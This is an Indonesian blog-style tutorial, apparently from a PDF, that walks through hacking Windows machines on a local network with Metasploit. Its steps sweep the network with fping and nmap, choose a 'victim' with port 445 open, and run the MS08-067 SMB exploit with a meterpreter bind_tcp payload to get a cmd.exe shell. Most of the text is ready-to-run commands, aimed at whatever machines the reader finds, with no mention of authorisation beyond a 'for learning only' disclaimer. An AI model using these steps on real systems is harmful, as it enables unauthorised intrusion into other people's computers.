Metasploit PDF
Metasploit PDF
org
Hack Windows using METASPLOIT
wew.. keren ya judulnya... sebenernya tutorial kayak gini pasti udah banyak di internet, cuma
lagi iseng aja sih pengen bikin tulisan tentang metasploit. Hehe.. :*
Pasti kalian semua yang sudah kenal apa itu metasploit. Kalo pengen lebih jelasnya baca aja di
websitenya metasploit.
tapi mungkin tutorial ini baru 1 di dunia, soalnya operating sistem yang saya pakai laen dari
yang lain.hehe... Biasanya OS yang digunakan untuk melakukan aksi exploitasi adalah
Backtrack. Yang memang sudah teruji kehandalannya untuk pentest (Penetration Testing).
Mau tau apa OSnya...? :P
Nah, sekedar share aja ya, OS yang saya gunakan untuk “bermain” metasploit adalah
TeaLinuxOS 2.0 yang sudah dimodifikasi untuk keperluan pentest :D. TeaLinuxOS adalah OS
yang dikembangkan oleh DOSCOM. Karena TeaLinuxOS diturunkan dari Ubuntu maka tutorial
ini juga berlaku untuk Ubuntu dan semua distro turunannya. :)
http://mazumam.web.id/
Email : mazumam@doscom.org
Yang perlu disiapkan adalah:
1. cemilan, buat ngilangin stress kalo exploitasi kita gagal mulu. :D
2. OS, terserah, yang penting Linux. :P
3. Metasploit framework , bisa donlod dulu di websitenya metasploit. Trus langsung
diinstall ya...
4. fping, install aja langsung (sudo aptget install fping)
5. nmap, (sudo aptget install nmap)
6. yang terakhir adalah yang paling penting, yaitu KORBANnya.Wkwkwk...
kalo semuanya sudah siap, berikut langkahlangkahnya:
1. scan dulu semua IP yang konek dalam jaringan. Disini saya menggunakan fping.
“fping -g IP_AWAL IP_AKHIR”
2. Pilih targetnya, biasanya yang paling empuk buat dijadiin korban adalah yang make OS
Wincrot, ups.. maksudnya Windows :) bisa pake nmap.
Caranya “nmap -A IP_TARGET”
http://mazumam.web.id/
Email : mazumam@doscom.org
3. Cek dan pastikan kalo kita bisa terkoneksi dengan target. Gunakan saja PING
“ping IP_TARGET”
4. scan port target kita, pastikan port 445 terbuka. Karena lewat port tersebut kita akan
melakukan exploitasi. Untuk scan port bisa pake nmap , caranya “nmap IP_TARGET”
5. jalankan metasploit,dg cara ketik “msfconsole” di terminal.
http://mazumam.web.id/
Email : mazumam@doscom.org
6. “show exploits” untuk melihat exploit yang disediakan oleh metasploit.
7. “use windows/smb/ms08_067_netapi”
8. “show payloads” untuk melihat payload yang ada apa aja.. :D
9. “set payload windows/meterpreter/bind_tcp”
10. “set rhost IP_TARGET”
11. “set lhost IP_KAMU”
12. yang terakhir “exploit”
http://mazumam.web.id/
Email : mazumam@doscom.org
13. nah.. kalo sudah berhasil, untuk menjalankan cmd.exe di komputer korban caranya
“execute -f cmd.exe -c -i”
14. kalo gagal, misalnya muncul text “Exploit completed, but no session was created”.
Nah.. ini saatnya memakan cemilan yang tadi udah disiapkan. Wkwkwk..
15. selamat belajar :D
NOTE:
tulisan ini hanya untuk pembelajaran saja, saya TIDAK bertanggung jawab atas hal
APAPUN akibat penyalahgunaan
SALAM OPEN SOURCE
any question? Please visit http://mazumam.web.id/
http://mazumam.web.id/